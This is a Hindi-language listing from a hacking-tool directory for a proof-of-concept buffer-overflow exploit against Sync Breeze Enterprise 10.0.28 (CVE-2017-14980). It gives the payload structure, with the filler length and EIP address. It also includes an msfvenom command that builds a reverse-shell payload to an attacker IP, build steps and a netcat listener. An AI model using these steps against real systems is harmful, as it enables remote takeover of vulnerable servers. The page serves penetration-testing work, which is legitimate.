Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2017-14980_syncbreeze_10.0.28_bof — Sync Breeze Enterprise v10.0.28 (CVE-2017-14980) के लिए प्रूफ-ऑफ-कॉन्सेप्ट बफर ओवरफ्लो एक्सप्लॉइट। अनुकूलित HTTP POST पेलोड भेजता है जो EIP को ओवरराइट करता है और कस्टम x86 शेलकोड निष्पादित करता है ताकि आर्बिट्ररी कोड निष्पादन हो सके। | Kitploit
उपकरण/GitHubGitHub/lipeozyy/cve-2017-14980_syncbreeze_10.0.28_bof
पेलोड जनरेशनभेद्यता विश्लेषणशोषणशेलकोडवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगबाइनरी शोषण
GitHublipeozyy/cve-2017-14980_syncbreeze_10.0.28_bof

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

CVE-2017-14980_syncbreeze_10.0.28_bof

Sync Breeze Enterprise v10.0.28 (CVE-2017-14980) के लिए प्रूफ-ऑफ-कॉन्सेप्ट बफर ओवरफ्लो एक्सप्लॉइट। अनुकूलित HTTP POST पेलोड भेजता है जो EIP को ओवरराइट करता है और कस्टम x86 शेलकोड निष्पादित करता है ताकि आर्बिट्ररी कोड निष्पादन हो सके।

रिपॉजिटरी देखें
231 साल पहलेअभी तक समीक्षित नहीं
साझा करें

एक्सप्लॉइट - CVE-2017-14980 - Sync Breeze Enterprise v10.0.28

इस रिपॉजिटरी में Sync Breeze Enterprise संस्करण 10.0.28 के लिए बफर ओवरफ्लो एक्सप्लॉइट (BOF) का एक प्रूफ-ऑफ-कॉन्सेप्ट शामिल है, जो CVE-2017-14980 के रूप में पहचानी गई भेद्यता को लक्षित करता है।

विवरण

यह भेद्यता /login एंडपॉइंट पर POST अनुरोध में password फ़ील्ड को संसाधित करते समय अनुचित इनपुट सत्यापन के कारण मौजूद है।
कोई हमलावर इस फ़ील्ड में अत्यधिक लंबा मान भेज सकता है, जो EIP को ओवरराइट करता है और मनमाना कोड निष्पादन की अनुमति देता है।

यह एक्सप्लॉइट सावधानीपूर्वक तैयार किए गए पेलोड को भेजता है जिसमें शामिल हैं:

  • 520 बाइट्स फिलर ('A')
  • EIP को ओवरराइट करने के लिए 4 बाइट्स
  • 20-बाइट NOP स्लेड
  • एक विंडोज x86 शेलकोड, जिसे अनुकूलित करके मनमाना कमांड निष्पादित किए जा सकते हैं

यह कैसे काम करता है

  1. एक्सप्लॉइट एम्बेडेड शेलकोड युक्त एक दुर्भावनापूर्ण बफर बनाता है।
  2. यह पेलोड को password फ़ील्ड में डालते हुए भेद्य सर्वर को एक HTTP POST अनुरोध भेजता है।
  • अनुरोध को संसाधित करते समय, एप्लिकेशन इंस्ट्रक्शन पॉइंटर (EIP) को ओवरराइट करता है और हमलावर द्वारा आपूर्ति किए गए शेलकोड को निष्पादित करता है।
  • आवश्यकताएँ

    • एक C कंपाइलर (जैसे, gcc)
    • Sync Breeze Enterprise 10.0.28 चलाने वाले लक्ष्य तक नेटवर्क पहुंच
    • EIP पता (\x83\x0C\x09\x10) और यदि आवश्यक हो तो शेलकोड का समायोजन

    msfvenom के साथ शेलकोड उत्पन्न करने का उदाहरण:

    root@kitploit:~
    msfvenom -p windows/shell_reverse_tcp LHOST=<YOUR_IP> LPORT=4444 EXITFUNC=thread -b "\x00\x0a\x0d" -f c
    
    root@kitploit:~
    gcc exploit.c -o exploit
    ./exploit
    
    
    root@kitploit:~
    nc -nlvp 4444
    
    टूल डाउनलोड करें